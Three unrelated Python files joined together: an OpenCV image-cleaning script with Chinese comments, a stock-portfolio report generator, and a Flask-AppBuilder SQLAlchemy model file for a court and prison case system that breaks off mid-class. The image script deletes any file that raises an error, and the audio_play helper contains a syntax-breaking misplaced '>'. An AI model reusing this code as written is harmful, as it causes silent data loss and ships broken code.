遍历指定文件夹中所有文件
:param path:
:return:
'''
global timg, img, w, h
print('开始遍历......')
for root, dirs, files in os.walk(path):
print('path', path)
# 第一次清洗,删除文件出错或打不开的图片文件
print('#######################第一次清洗-开始#######################')
for name in files:
fname = os.path.join(root, name)
print('fname', fname)
if len(dirs) == 0:
try:
timg = os.path.join(root, name)
img = Image.open((timg))
# 图像文件长与宽
w = img.width
h = img.height
rate = w / h
print(fname, 'w=', w, 'h=', h, 'rate=', rate)
# 剔除图片
if (r_tag):
if w in range(w_min, w_max) and h in range(h_min, h_max):
os.remove(timg)
print('删除图片')
print(timg)
pass
# 显示图片并进行调整大小
src = cv2.imread(fname)
cv2.namedWindow('src', cv2.WINDOW_AUTOSIZE)
# src = cv2.resize(src, (0, 0), fx=0.1, fy=0.1, interpolation=cv2.INTER_NEAREST)
src = cv2.resize(src, (640, 480))
cv2.imshow('src', src)
# k = cv2.waitKey(0)
# if k == 27: return 0
key = cv2.waitKey(0)
if key == 27: # 按esc键退出
print('esc break...')
cv2.destroyAllWindows()
break
if key == ord(' '): # 按空格键删除当前图片
print('删除当前图片成功')
os.remove(timg)
if key == ord('s'):
# 创建src目录并存储图片
print('保存当前图片到src目录下')
src_dir = root + '/src/'
src_path = root + '/src/' + name
print('src_dir', src_dir)
print('src_path', src_path)
os_mkdir(src_dir)
cv2.imwrite(src_path, src)
except:
print('删除当前图片成功', timg)
os.remove(timg)
img.close()
print('#######################第一次清洗-结束#######################')
if __name__ == '__main__':
# path = '/home/hxzh02/文档/defectDetect/金属锈蚀(复件)'
# path = '/home/hxzh02/文档/PlanetDataset/电力输电塔架'
# path = '/home/hxzh02/文档/PlanetDataset/输电塔'
# path = '/home/hxzh02/文档/PlanetDataset/输电塔架'
# path = '/home/hxzh02/文档/PlanetDataset/输电铁塔'
# path = '/home/hxzh02/文档/PlanetDataset/猫头塔'
# path = '/home/hxzh02/文档/PlanetDataset/干字塔'
# path = '/home/hxzh02/文档/PlanetDataset/src/双回路塔'
# path = '/home/hxzh02/文档/PlanetDataset/src/电力输电塔架'
# path = '/home/hxzh02/文档/PlanetDataset/src/单回路塔'
# path = '/home/hxzh02/文档/PlanetDataset/src/输电塔'
# path = '/home/hxzh02/文档/PlanetDataset/src/输电塔架'
# path = '/home/hxzh02/文档/PlanetDataset/src/干字塔'
# path = '/home/hxzh02/文档/PlanetDataset/src/官帽塔'
# path = '/home/hxzh02/文档/PlanetDataset/src/酒杯塔'
# path = '/home/hxzh02/文档/PlanetDataset/src/电网铁塔'
# dataWash_1(path)
# images_Normalization(path)
# path = '/home/hxzh02/桌面/杆塔倒塌-负样本/'
# path = '/home/hxzh02/文档/defectDetect/金属锈蚀-原数据-标注/'
# images_Normalization(path, False)
# dataWash_1(path)
path = '/home/hxzh02/文档/PokeGAN/data/sprites_rgb/'
images_Normalization(path)
|
<reponame>FriendlyUser/price-prediction
# Hold off on prophet image generation, probably not useful since I buy small caps
import sys
import argparse as ap
import pathlib
import glob
import shutil
from jinja2 import Template
from datetime import date, datetime
from stocks.util import get_config
from stocks.report import make_risk_metrics, \
make_performance_plot, make_estimated_returns, \
make_portfolio_allocations
def main(args):
end_date = str(date.today())
gh_pages_name = 'gh-pages'
for report_cfg_file in glob.glob("stocks/cfg/*.yml"):
report_cfg = get_config(report_cfg_file)
options = dict(Version="1.0.0", CurrDate=end_date)
stocks = report_cfg["stocks"]
weights = report_cfg["weights"]
start_date = report_cfg["start_date"]
report_name = report_cfg["name"]
# Relative paths to performance images,
# images are in the same directory as index.html
output_folder = f"{args.output}/{report_name}"
pathlib.Path(output_folder).mkdir(parents=True, exist_ok=True)
if isinstance(weights, str):
# set equal list based on stock length
# TODO add more types later
weights = [1.00 / len(stocks)] * len(stocks)
risk_metrics = make_risk_metrics(stocks, weights, start_date, end_date)
else:
risk_metrics = make_risk_metrics(stocks, weights, start_date, end_date)
# Add Var, VaR, CVaR, CDaR
options["RISK_METRICS"] = risk_metrics
options["ESTIMATED_RETURNS"] = make_estimated_returns(stocks, start_date, end_date)
performance_images = []
image_name = f"{start_date}_{end_date}_basic.png"
plot_made = make_performance_plot(
stocks,
start_date=start_date,
end_date=end_date,
file_name=f"{output_folder}/{image_name}"
)
if plot_made is not None:
performance_images.append(image_name)
else:
print(f"PLOT NOT MADE for {image_name} for {report_name}")
options["PERFORMANCE_IMAGES"] = performance_images
# Adding weights optimization
if "portfolio_opt" in report_cfg:
portfolio_opt = report_cfg["portfolio_opt"]
# Get prices for stocks, if I ever get to rebuilding this
# pass in stock prices once, not a huge deal, not time sensitive issue
portfolio_allocations = make_portfolio_allocations(
stocks,
portfolio_opt,
start_date,
end_date
)
options["PORTFOLIO_ALLOCATIONS"] = portfolio_allocations
# iterate across the portfolio
with open(args.template) as file_:
template = Template(file_.read())
renderer_template = template.render(**options)
with open(f"{output_folder}/index.html", "w", errors='ignore') as f:
f.write(renderer_template)
# Attempt to move the folder
# Make in gh pages folder even if exists
gh_report_folder = f"{args.output}/{gh_pages_name}/{report_name}/{end_date}"
pathlib.Path(gh_report_folder).mkdir(parents=True, exist_ok=True)
# Any files in the output folder, if I need nested files in folders
# use something else
for report_file in glob.glob(f"{output_folder}/*"):
try:
shutil.move(report_file, gh_report_folder)
except shutil.Error as e:
print(e)
# Could make into another function
if __name__ == "__main__":
assert sys.version_info >= (3, 6)
startTime = datetime.now()
parser = ap.ArgumentParser()
parser.add_argument("-o",
"--output",
help="Output folder",
default="report")
parser.add_argument("-t",
"--template",
help="Template file",
default="stocks/cfg/template.jinja2")
args = parser.parse_args()
main(args)
print("Script Complete")
print(datetime.now() - startTime)
|
# coding: utf-8
# AUTOGENERATED BY gen_script.sh from kp4.py
# Copyright (C) <NAME>, Sun Aug 13 05:04:25 EAT 2017
from sqlalchemy import func
from flask_appbuilder import Model
from flask_appbuilder.models.mixins import AuditMixin, FileColumn, ImageColumn, UserExtensionMixin
from flask_appbuilder.models.decorators import renders
from flask_appbuilder.filemanager import ImageManager
from sqlalchemy_utils import aggregated, force_auto_coercion, observes
from sqlalchemy_continuum import make_versioned
from sqlalchemy_searchable import make_searchable
from sqlalchemy_utils.types import TSVectorType #Searchability look at DocMixin
# ActiveRecord Model Features
from sqlalchemy_mixins import AllFeaturesMixin, ActiveRecordMixin
from sqlalchemy.orm import relationship, query, defer, deferred
# IMPORT Postgresql Specific Types
from sqlalchemy.dialects.postgresql import (
ARRAY, BIGINT, BIT, BOOLEAN, BYTEA, CHAR, CIDR, DATE, DOUBLE_PRECISION,
ENUM, FLOAT, HSTORE, INET, INTEGER, INTERVAL, JSON, JSONB, MACADDR, NUMERIC,
OID, REAL, SMALLINT, TEXT, TIME, TIMESTAMP, UUID, VARCHAR, INT4RANGE,
INT8RANGE, NUMRANGE, DATERANGE, TSRANGE, TSTZRANGE, TSVECTOR)
from sqlalchemy.dialects.postgresql import aggregate_order_by
from sqlalchemy import (Column, Integer, String, ForeignKey, Sequence, Float,
Text, BigInteger, Date, DateTime, Time, Boolean, Index,
CheckConstraint, UniqueConstraint, ForeignKeyConstraint,
Numeric, LargeBinary, Table)
from datetime import timedelta, datetime, date
from sqlalchemy.dialects.postgresql import *
from sqlalchemy.sql import func
from .mixins import *
# Here is how to extend the User model
#class UserExtended(Model, UserExtensionMixin):
# contact_group_id = Column(Integer, ForeignKey('contact_group.id'), nullable=True)
# contact_group = relationship('ContactGroup')
# UTILITY CLASSES
import arrow, enum, datetime
import enum
# Initialize sqlalchemy_utils
#force_auto_coercion()
# Keep versions of all data
make_versioned()
make_searchable()
def future_date(days):
return datetime.datetime.now() + datetime.timedelta(days=days)
class Bail(AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'bail'
id = Column(Integer, primary_key=True, autoincrement=True)
hearing = Column(ForeignKey(u'hearing.id'), nullable=False, index=True)
defendant = Column(ForeignKey(u'defendant.id'), nullable=False, index=True)
amountgranted = Column(Numeric(12, 2))
noofsureties = Column(Integer, nullable=False)
paid = Column(Boolean)
paydate = Column(Date)
defendant1 = relationship(
u'Defendant',
primaryjoin='Bail.defendant == Defendant.id',
backref=u'bails')
hearing1 = relationship(
u'Hearing', primaryjoin='Bail.hearing == Hearing.id', backref=u'bails')
surety = relationship(u'Surety', secondary='bail_surety', backref=u'bails')
bail_surety = Table('bail_surety', Model.metadata,
Column(
'bail',
ForeignKey(u'bail.id'),
primary_key=True,
nullable=False),
Column(
'surety',
ForeignKey(u'surety.id'),
primary_key=True,
nullable=False,
index=True))
class Case(ActivityMixin, AuditMixin, NameMixin, Model):
__versioned__ = {}
__tablename__ = 'case'
id = Column(Integer, primary_key=True, autoincrement=True)
police_station_reported = Column(
ForeignKey(u'policestation.id'), nullable=False, index=True)
report_date = Column(DateTime, nullable=False, default=func.now())
complaint = Column(Text, nullable=False)
is_criminal = Column(Boolean, nullable=True)
priority = Column(Integer, nullable=False, default=5)
investigationassigmentdate = Column(DateTime, default=func.now())
investigationassignmentnote = Column(Text)
investigationplan = Column(Text)
investigationsummary = Column(Text)
investigationreview = Column(Text)
investigationcomplete = Column(Boolean)
dppadvicerequested = Column(Boolean)
dppadvicedate = Column(Date)
dppadvice = Column(Text)
sendtotrial = Column(Boolean, default=False)
casename = Column(String(400))
docketnumber = Column(String(100))
chargesheet = Column(Text, nullable=False)
chargedate = Column(DateTime, default=func.now())
judgement = Column(Text)
judgementdate = Column(DateTime, default=func.now())
sentencelengthyr = Column(Integer)
sentencelengthmnth = Column(Integer)
senetencelenghtdays = Column(Integer)
sentencestartdate = Column(Date)
sentenceexpirydate = Column(Date)
fineamount = Column(Numeric(12, 2))
caseappealed = Column(Boolean)
appealdate = Column(DateTime, default=func.now())
appealexpiry = Column(Date)
caseclosed = Column(Boolean)
closedate = Column(Date)
reported_to = Column(ForeignKey(u'polofficer.id'), index=True)
policestation = relationship(
u'Policestation',
primaryjoin='Case.police_station_reported == Policestation.id',
backref=u'cases')
polofficer = relationship(
u'Polofficer',
primaryjoin='Case.reported_to == Polofficer.id',
backref=u'polofficer_polofficer_cases')
natureofsuit = relationship(
u'Natureofsuit', secondary='case_natureofsuit', backref=u'cases')
polofficer1 = relationship(
u'Polofficer',
secondary='case_polofficer',
backref=u'polofficer_polofficer_cases_0')
polofficer2 = relationship(
u'Polofficer',
secondary='caseinvestigation',
backref=u'polofficer_polofficer_cases_1')
casecategory = relationship(
u'Casecategory', secondary='case_casecategory', backref=u'cases')
defendant = relationship(
u'Defendant', secondary='case_defendant', backref=u'cases')
prosecutor = relationship(
u'Prosecutor', secondary='case_prosecutor', backref=u'prosecutor_cases')
tag = relationship(u'Tag', secondary='case_tag', backref=u'cases')
plaintiff = relationship(
u'Plaintiff', secondary='case_plaintiff', backref=u'cases')
witness = relationship(
u'Witnes', secondary='case_witness', backref=u'cases')
prosecutor1 = relationship(
u'Prosecutor',
secondary='case_prosecutor_2',
backref=u'prosecutor_cases_0')
causeofaction = relationship(
u'Causeofaction', secondary='case_causeofaction', backref=u'cases')
case_casecategory = Table('case_casecategory', Model.metadata,
Column(
'case',
ForeignKey(u'case.id'),
primary_key=True,
nullable=False),
Column(
'casecategory',
ForeignKey(u'casecategory.id'),
primary_key=True,
nullable=False,
index=True))
case_causeofaction = Table('case_causeofaction', Model.metadata,
Column(
'case',
ForeignKey(u'case.id'),
primary_key=True,
nullable=False),
Column(
'causeofaction',
ForeignKey(u'causeofaction.id'),
primary_key=True,
nullable=False,
index=True))
case_defendant = Table('case_defendant', Model.metadata,
Column(
'case',
ForeignKey(u'case.id'),
primary_key=True,
nullable=False),
Column(
'defendant',
ForeignKey(u'defendant.id'),
primary_key=True,
nullable=False,
index=True))
case_natureofsuit = Table('case_natureofsuit', Model.metadata,
Column(
'case',
ForeignKey(u'case.id'),
primary_key=True,
nullable=False),
Column(
'natureofsuit',
ForeignKey(u'natureofsuit.id'),
primary_key=True,
nullable=False,
index=True))
case_plaintiff = Table('case_plaintiff', Model.metadata,
Column(
'case',
ForeignKey(u'case.id'),
primary_key=True,
nullable=False),
Column(
'plaintiff',
ForeignKey(u'plaintiff.id'),
primary_key=True,
nullable=False,
index=True))
case_polofficer = Table('case_polofficer', Model.metadata,
Column(
'case',
ForeignKey(u'case.id'),
primary_key=True,
nullable=False),
Column(
'polofficer',
ForeignKey(u'polofficer.id'),
primary_key=True,
nullable=False,
index=True))
case_prosecutor = Table('case_prosecutor', Model.metadata,
Column(
'case',
ForeignKey(u'case.id'),
primary_key=True,
nullable=False),
Column(
'prosecutor',
ForeignKey(u'prosecutor.id'),
primary_key=True,
nullable=False,
index=True))
case_prosecutor_2 = Table('case_prosecutor_2', Model.metadata,
Column(
'case',
ForeignKey(u'case.id'),
primary_key=True,
nullable=False),
Column(
'prosecutor',
ForeignKey(u'prosecutor.id'),
primary_key=True,
nullable=False,
index=True))
case_tag = Table('case_tag', Model.metadata,
Column(
'case',
ForeignKey(u'case.id'),
primary_key=True,
nullable=False),
Column(
'tag',
ForeignKey(u'tag.id'),
primary_key=True,
nullable=False,
index=True))
case_witness = Table('case_witness', Model.metadata,
Column(
'case',
ForeignKey(u'case.id'),
primary_key=True,
nullable=False),
Column(
'witness',
ForeignKey(u'witness.id'),
primary_key=True,
nullable=False,
index=True))
class Casecategory(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'casecategory'
id = Column(Integer, primary_key=True, autoincrement=True)
indictable = Column(Boolean)
is_criminal = Column(Boolean, default=True)
caseinvestigation = Table('caseinvestigation', Model.metadata,
Column(
'pol_officers',
ForeignKey(u'polofficer.id'),
primary_key=True,
nullable=False),
Column(
'cases',
ForeignKey(u'case.id'),
primary_key=True,
nullable=False,
index=True))
class Causeofaction(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'causeofaction'
id = Column(Integer, primary_key=True, autoincrement=True)
criminal = Column(Boolean, nullable=False)
parent_coa = Column(ForeignKey(u'causeofaction.id'), index=True)
parent = relationship(
u'Causeofaction',
remote_side=[id],
primaryjoin='Causeofaction.parent_coa == Causeofaction.id',
backref=u'causeofactions')
filing = relationship(
u'Filing', secondary='causeofaction_filing', backref=u'causeofactions')
hearing = relationship(
u'Hearing',
secondary='causeofaction_hearing',
backref=u'causeofactions')
causeofaction_filing = Table('causeofaction_filing', Model.metadata,
Column(
'causeofaction',
ForeignKey(u'causeofaction.id'),
primary_key=True,
nullable=False),
Column(
'filing',
ForeignKey(u'filing.id'),
primary_key=True,
nullable=False,
index=True))
causeofaction_hearing = Table('causeofaction_hearing', Model.metadata,
Column(
'causeofaction',
ForeignKey(u'causeofaction.id'),
primary_key=True,
nullable=False),
Column(
'hearing',
ForeignKey(u'hearing.id'),
primary_key=True,
nullable=False,
index=True))
class Commitaltype(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'commitaltype'
id = Column(Integer, primary_key=True, autoincrement=True)
prisoncommital = relationship(
u'Prisoncommital',
secondary='commitaltype_prisoncommital',
backref=u'commitaltypes')
commitaltype_prisoncommital = Table(
'commitaltype_prisoncommital', Model.metadata,
Column(
'commitaltype',
ForeignKey(u'commitaltype.id'),
primary_key=True,
nullable=False),
Column('prisoncommital_prison', Integer, primary_key=True, nullable=False),
Column(
'prisoncommital_warrantno',
String(100),
primary_key=True,
nullable=False),
ForeignKeyConstraint(
['prisoncommital_prison', 'prisoncommital_warrantno'],
[u'prisoncommital.prison', u'prisoncommital.warrantno']),
Index('idx_commitaltype_prisoncommital', 'prisoncommital_prison',
'prisoncommital_warrantno'))
class Constituency(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'constituency'
id = Column(Integer, primary_key=True, autoincrement=True)
county = Column(ForeignKey(u'county.id'), nullable=False, index=True)
town = Column(ForeignKey(u'town.id'), index=True)
county1 = relationship(
u'County',
primaryjoin='Constituency.county == County.id',
backref=u'constituencies')
town1 = relationship(
u'Town',
primaryjoin='Constituency.town == Town.id',
backref=u'constituencies')
def __repr__(self):
return self.name
class County(AuditMixin, RefTypeMixin, Model):
__versioned__ = {}
__tablename__ = 'county'
id = Column(Integer, primary_key=True, autoincrement=True)
def __repr__(self):
return self.name
class Court(PlaceMixin, RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'court'
id = Column(Integer, primary_key=True, autoincrement=True)
court_station = Column(
ForeignKey(u'courtstation.id'), nullable=False, index=True)
courtstation = relationship(
u'Courtstation',
primaryjoin='Court.court_station == Courtstation.id',
backref=u'courts')
def __repr__(self):
return self.name
class Courtlevel(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'courtlevel'
id = Column(Integer, primary_key=True, autoincrement=True)
def __repr__(self):
return self.name
class Courtstation(PlaceMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'courtstation'
id = Column(Integer, primary_key=True, autoincrement=True)
residentmagistrate = Column(String(100))
registrar = Column(String(100), nullable=False)
court_level = Column(
ForeignKey(u'courtlevel.id'), nullable=False, index=True)
num_of_courts = Column(Integer)
town = Column(ForeignKey(u'town.id'), nullable=False, index=True)
courtlevel = relationship(
u'Courtlevel',
primaryjoin='Courtstation.court_level == Courtlevel.id',
backref=u'courtstations')
town1 = relationship(
u'Town',
primaryjoin='Courtstation.town == Town.id',
backref=u'courtstations')
def __repr__(self):
return self.place_name
class Defendant(PersonMedicalMixin, PersonDocMixin, BiometricMixin,
EmploymentMixin, PersonMixin, ContactMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'defendant'
def ViewName(self):
return self.__class__.__name__ + 'View'
def photo_img(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' + im.get_url(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def photo_img_thumbnail(self):
im = ImageManager()
vn = self.ViewName()
if self.photo:
return Markup(
'<a href="' + url_for(vn + '.show', pk=str(self.id)) +
'" class="thumbnail"><img src="' +
im.get_url_thumbnail(self.photo) +
'" alt="Photo" class="img-rounded img-responsive"></a>')
else:
return Markup(
'<a href="' + url_for(vn, pk=str(self.id)) +
'" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
)
def print_button(self):
vn = self.ViewName()
#pdf = render_pdf(url_for(vn, pk=str(self.id)))
#pdf = pdfkit.from_string(url_for(vn, pk=str(self.id)))
#response = make_response(pdf)
#response.headers['Content-Type'] = 'application/pdf'
#response.headers['Content-Disposition'] = 'inline; filename=output.pdf'
return Markup(
'<a href="' + url_for(vn) +
'" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
+ 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')
def audio_play(self):
vn = self.ViewName()
return Markup(
'<audio controls autoplay>' + '<source src="' + url_for(vn) +
'" type="audio/mpeg"' > + '<i class="fa fa-volume-up"></i>' +
'Your browser does not support the audio element.' + '</audio>')
# edit_form_extra_fields = {'field2': TextField('field2',
# widget=BS3TextFieldROWidget())}
id = Column(Integer, primary_key=True, autoincrement=True)
juvenile = Column(Boolean)
gender = Column(ForeignKey(u'gender.id'), nullable=False, index=True)
prisoncell = Column(
ForeignKey(u'prisoncell.id'), nullable=False, index=True)
casecount = Column(Integer)
gender1 = relationship(
u'Gender',
primaryjoin='Defendant.gender == Gender.id',
backref=u'defendants')
prisoncell1 = relationship(
u'Prisoncell',
primaryjoin='Defendant.prisoncell == Prisoncell.id',
backref=u'defendants')
medevent = relationship(
u'Medevent', secondary='defendant_medevent', backref=u'defendants')
gateregister = relationship(
u'Gateregister',
secondary='defendant_gateregister',
backref=u'defendants')
hearing = relationship(
u'Hearing', secondary='defendant_hearing', backref=u'defendants')
defendant_gateregister = Table('defendant_gateregister', Model.metadata,
Column(
'defendant',
ForeignKey(u'defendant.id'),
primary_key=True,
nullable=False),
Column(
'gateregister',
ForeignKey(u'gateregister.id'),
primary_key=True,
nullable=False,
index=True))
defendant_hearing = Table('defendant_hearing', Model.metadata,
Column(
'defendant',
ForeignKey(u'defendant.id'),
primary_key=True,
nullable=False),
Column(
'hearing',
ForeignKey(u'hearing.id'),
primary_key=True,
nullable=False,
index=True))
defendant_medevent = Table('defendant_medevent', Model.metadata,
Column(
'defendant',
ForeignKey(u'defendant.id'),
primary_key=True,
nullable=False),
Column(
'medevent',
ForeignKey(u'medevent.id'),
primary_key=True,
nullable=False,
index=True))
class Discipline(ActivityMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'discipline'
id = Column(Integer, primary_key=True, autoincrement=True)
defendant = Column(ForeignKey(u'defendant.id'), nullable=False, index=True)
defendant1 = relationship(
u'Defendant',
primaryjoin='Discipline.defendant == Defendant.id',
backref=u'disciplines')
class Docarchive(AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'docarchive'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(Text)
doc = Column(Text)
scandate = Column(DateTime, default=func.now())
archival = Column(Boolean, default=True)
tag = relationship(
u'Tag', secondary='docarchive_tag', backref=u'docarchives')
docarchive_tag = Table('docarchive_tag', Model.metadata,
Column(
'docarchive',
ForeignKey(u'docarchive.id'),
primary_key=True,
nullable=False),
Column(
'tag',
ForeignKey(u'tag.id'),
primary_key=True,
nullable=False,
index=True))
class Doctemplate(DocMixin, RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'doctemplate'
id = Column(Integer, primary_key=True, autoincrement=True)
class Document(DocMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'document'
id = Column(Integer, primary_key=True, autoincrement=True)
filing = Column(ForeignKey(u'filing.id'), nullable=False, index=True)
doc_template = Column(ForeignKey(u'doctemplate.id'), index=True)
confidential = Column(Boolean)
pagecount = Column(Integer)
locked = Column(Boolean)
hash = Column(Text)
doctemplate = relationship(
u'Doctemplate',
primaryjoin='Document.doc_template == Doctemplate.id',
backref=u'documents')
filing1 = relationship(
u'Filing',
primaryjoin='Document.filing == Filing.id',
backref=u'documents')
tag = relationship(u'Tag', secondary='document_tag', backref=u'documents')
document_tag = Table('document_tag', Model.metadata,
Column(
'document',
ForeignKey(u'document.id'),
primary_key=True,
nullable=False),
Column(
'tag',
ForeignKey(u'tag.id'),
primary_key=True,
nullable=False,
index=True))
class Eventlog(AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'eventlog'
id = Column(Integer, primary_key=True, autoincrement=True)
temporal = Column(DateTime, default=func.now())
event = Column(Text)
severity = Column(Integer)
alert = Column(Boolean)
notes = Column(Text)
tbl = Column(Text)
colname = Column(Text)
colbefore = Column(Text)
colafter = Column(Text)
class Filing(AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'filing'
id = Column(Integer, primary_key=True, autoincrement=True)
uploaddate = Column(DateTime, default=func.now())
pagecount = Column(Integer)
totalfees = Column(Numeric(12, 2), nullable=False)
filing_attorney = Column(
ForeignKey(u'lawyers.id'), nullable=False, index=True)
filing_prosecutor = Column(
ForeignKey(u'prosecutor.id'), nullable=False, index=True)
assessedfees = Column(Numeric(12, 2))
receiptverified = Column(Boolean, default=False)
amountpaid = Column(Numeric(12, 2), default=0.00)
feebalance = Column(Numeric(12, 2), default=0.00)
paymenthistory = Column(Text, nullable=False)
case = Column(ForeignKey(u'case.id'), nullable=False, index=True)
urgent = Column(Boolean, default=False)
urgentreason = Column(Text)
case1 = relationship(
u'Case', primaryjoin='Filing.case == Case.id', backref=u'filings')
lawyer = relationship(
u'Lawyer',
primaryjoin='Filing.filing_attorney == Lawyer.id',
backref=u'filings')
prosecutor = relationship(
u'Prosecutor',
primaryjoin='Filing.filing_prosecutor == Prosecutor.id',
backref=u'filings')
payment = relationship(
u'Payment', secondary='filing_payment', backref=u'filings')
filingtype = relationship(
u'Filingtype', secondary='filing_filingtype', backref=u'filings')
filing_filingtype = Table('filing_filingtype', Model.metadata,
Column(
'filing',
ForeignKey(u'filing.id'),
primary_key=True,
nullable=False),
Column(
'filingtype',
ForeignKey(u'filingtype.id'),
primary_key=True,
nullable=False,
index=True))
filing_payment = Table('filing_payment', Model.metadata,
Column(
'filing',
ForeignKey(u'filing.id'),
primary_key=True,
nullable=False),
Column(
'payment',
ForeignKey(u'payment.id'),
primary_key=True,
nullable=False,
index=True))
class Filingtype(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'filingtype'
id = Column(Integer, primary_key=True, autoincrement=True)
fees = Column(Numeric(12, 2), default=0.00)
perpagecost = Column(Numeric(12, 2), default=0.00)
paid_per_page = Column(Boolean, default=False)
class Gateregister(AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'gateregister'
id = Column(Integer, primary_key=True, autoincrement=True)
prison = Column(ForeignKey(u'prison.id'), nullable=False, index=True)
opentime = Column(DateTime, default=func.now())
closedtime = Column(DateTime, default=func.now())
openduration = Column(INTERVAL)
movementdirection = Column(Boolean)
reason = Column(Text)
staffmovement = Column(Boolean)
goodsmovement = Column(Text, nullable=False)
vehicle_reg = Column(Text)
vehicle_color = Column(Text, nullable=False)
prison1 = relationship(
u'Prison',
primaryjoin='Gateregister.prison == Prison.id',
backref=u'gateregisters')
warder = relationship(
u'Warder',
secondary='gateregister_warder_2',
backref=u'warder_gateregisters')
warder1 = relationship(
u'Warder',
secondary='gateregister_warder',
backref=u'warder_gateregisters_0')
gateregister_warder = Table('gateregister_warder', Model.metadata,
Column(
'gateregister',
ForeignKey(u'gateregister.id'),
primary_key=True,
nullable=False),
Column(
'warder',
ForeignKey(u'warder.id'),
primary_key=True,
nullable=False,
index=True))
gateregister_warder_2 = Table('gateregister_warder_2', Model.metadata,
Column(
'gateregister',
ForeignKey(u'gateregister.id'),
primary_key=True,
nullable=False),
Column(
'warder',
ForeignKey(u'warder.id'),
primary_key=True,
nullable=False,
index=True))
class Gender(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'gender'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String(20), nullable=False, unique=True)
def __init__(self, name):
self.name = name
class Hearing(ActivityMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'hearing'
id = Column(Integer, primary_key=True, autoincrement=True)
hearingdate = Column(DateTime, nullable=False, default=func.now())
adjourned = Column(Boolean, default=False)
completed = Column(Boolean, default=False)
case = Column(ForeignKey(u'case.id'), nullable=False, index=True)
court = Column(ForeignKey(u'court.id'), nullable=False, index=True)
remandwarrant = Column(Text)
hearing_type = Column(
ForeignKey(u'hearingtype.id'), nullable=False, index=True)
remanddays = Column(Integer)
remanddate = Column(Date)
remandwarrantexpirydate = Column(Date)
nexthearingdate = Column(Date)
finalhearing = Column(Boolean, nullable=False)
transcript = Column(Text)
audio = Column(ImageColumn)
video = Column(ImageColumn)
case1 = relationship(
u'Case', primaryjoin='Hearing.case == Case.id', backref=u'hearings')
court1 = relationship(
u'Court', primaryjoin='Hearing.court == Court.id', backref=u'hearings')
hearingtype = relationship(
u'Hearingtype',
primaryjoin='Hearing.hearing_type == Hearingtype.id',
backref=u'hearings')
prosecutor = relationship(
u'Prosecutor', secondary='hearing_prosecutor', backref=u'hearings')
lawyers = relationship(
u'Lawyer', secondary='hearing_lawyers', backref=u'hearings')
judicialofficer = relationship(
u'Judicialofficer',
secondary='hearing_judicialofficer',
backref=u'hearings')
polofficer = relationship(
u'Polofficer', secondary='hearing_polofficer', backref=u'hearings')
witness = relationship(
u'Witnes', secondary='hearing_witness', backref=u'hearings')
tag = relationship(u'Tag', secondary='hearing_tag', backref=u'hearings')
hearing_judicialofficer = Table('hearing_judicialofficer', Model.metadata,
Column(
'hearing',
ForeignKey(u'hearing.id'),
primary_key=True,
nullable=False),
Column(
'judicialofficer',
ForeignKey(u'judicialofficer.id'),
primary_key=True,
nullable=False,
index=True))
hearing_lawyers = Table('hearing_lawyers', Model.metadata,
Column(
'hearing',
ForeignKey(u'hearing.id'),
primary_key=True,
nullable=False),
Column(
'lawyers',
ForeignKey(u'lawyers.id'),
primary_key=True,
nullable=False,
index=True))
hearing_polofficer = Table('hearing_polofficer', Model.metadata,
Column(
'hearing',
ForeignKey(u'hearing.id'),
primary_key=True,
nullable=False),
Column(
'polofficer',
ForeignKey(u'polofficer.id'),
primary_key=True,
nullable=False,
index=True))
hearing_prosecutor = Table('hearing_prosecutor', Model.metadata,
Column(
'hearing',
ForeignKey(u'hearing.id'),
primary_key=True,
nullable=False),
Column(
'prosecutor',
ForeignKey(u'prosecutor.id'),
primary_key=True,
nullable=False,
index=True))
hearing_tag = Table('hearing_tag', Model.metadata,
Column(
'hearing',
ForeignKey(u'hearing.id'),
primary_key=True,
nullable=False),
Column(
'tag',
ForeignKey(u'tag.id'),
primary_key=True,
nullable=False,
index=True))
hearing_witness = Table('hearing_witness', Model.metadata,
Column(
'hearing',
ForeignKey(u'hearing.id'),
primary_key=True,
nullable=False),
Column(
'witness',
ForeignKey(u'witness.id'),
primary_key=True,
nullable=False,
index=True))
class Hearingtype(RefTypeMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'hearingtype'
id = Column(Integer, primary_key=True, autoincrement=True)
class Investigation(PlaceMixin, AuditMixin, Model):
__versioned__ = {}
__tablename__ = 'investigation'
id = Column(Integer, primary_key=True, autoincrement=True)
case = Column(ForeignKey(u'case.id'), nullable=False, index=True)
actiondate = Column(DateTime, default=func.now())
evidence = Column(Text, nullable=False)
narrative = Column(Text, nullable=False)
weather = Column(Text, nullable=False)
location = Column(Text, nullable=False)
case1 = relationship(
u'Case',
primaryjoin='Investigation.case == Case.id',
backref=u'investigations')
polofficer = relationship(
u'Polofficer',
secondary='investigation_polofficer',
